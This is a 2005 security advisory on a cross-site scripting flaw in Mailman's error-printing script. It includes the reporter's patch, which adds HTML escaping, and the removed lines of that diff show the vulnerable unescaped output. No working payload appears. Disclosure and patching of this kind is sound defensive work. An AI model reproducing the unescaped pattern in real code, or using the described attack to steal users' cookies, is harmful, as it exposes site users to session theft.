Mailman Input Validation Error in 'scripts/driver' Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1013494|
SecurityTracker URL: http://securitytracker.com/id/1013494
(Links to External Site)
Updated: Mar 28 2005|
Original Entry Date: Mar 21 2005
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information|
Fix Available: Yes Vendor Confirmed: Yes |
Version(s): 2.15 and prior versions|
An input validation vulnerability was reported in Mailman when processing error messages. A remote user can conduct cross-site scripting attacks.|
The 'scripts/driver' code does not properly escape the <>& characters from environment variables when printing an error message. A remote user can create a specially crafted URL (designed to trigger a Mailman error) that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Mailman software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Florian Weimer reported this vulnerability.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Mailman software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.|
A fix is available via CVS at:|
Vendor URL: mailman.sourceforge.net/ (Links to External Site)
Input validation error|
|Underlying OS: Linux (Any), UNIX (Any)|
This archive entry has one or more follow-up message(s) listed below.|
Source Message Contents
Subject: [CVE-2004-1177] cross-site scripting in scripts/driver|
scripts/driver does not properly escape the <>& characters when it
prints the environment once an error is detected.
A fix has been committed to the Mailman CVS repository. My patch for
this issue is attached below.
(I'm not sure if woody is affected or not.)
diff -urNad mailman-2.1.5/scripts/driver /tmp/dpep.mzDE9X/mailman-2.1.5/scripts/driver
--- mailman-2.1.5/scripts/driver 2004-12-22 14:41:22.000000000 +0100
+++ /tmp/dpep.mzDE9X/mailman-2.1.5/scripts/driver 2004-12-22 14:41:22.000000000 +0100
@@ -30,6 +30,9 @@
# printed in the error logs.
STEALTH_MODE = 0
+# This will be set to the entity escaper.
+escape = None
# This standard driver script is used to run CGI programs, wrapped in code
@@ -57,6 +60,19 @@
# creation of the real logger below fails, we can still get
# *something* meaningful.
logger = None
+ # We need the entity escaper if we want to run in non-stealth
+ # mode.
+ global STEALTH_MODE, escape
+ if not STEALTH_MODE:
+ import xml.sax.saxutils
+ escape = xml.sax.saxutils.escape
+ if escape is None:
+ STEALTH_MODE = 1
# Map stderr to a logger, if possible.
@@ -150,10 +166,12 @@
+ for line in traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback):
+ print escape(line),
print '[failed to import module traceback]'
- print '[exc: %s, var: %s]' % sys.exc_info()[0:2]
+ print '[exc: %s, var: %s]' % map(escape, sys.exc_info()[0:2])
print '''<p>Please inform the webmaster for this site of this
@@ -221,7 +239,7 @@
for k, v in os.environ.items():
- print '<tr><td><tt>', k, '</tt></td><td>', v, '</td></tr>'
+ print '<tr><td><tt>', escape(k), '</tt></td><td>', escape(v), '</td></tr>'
print '<p><hr>[failed to import module os]'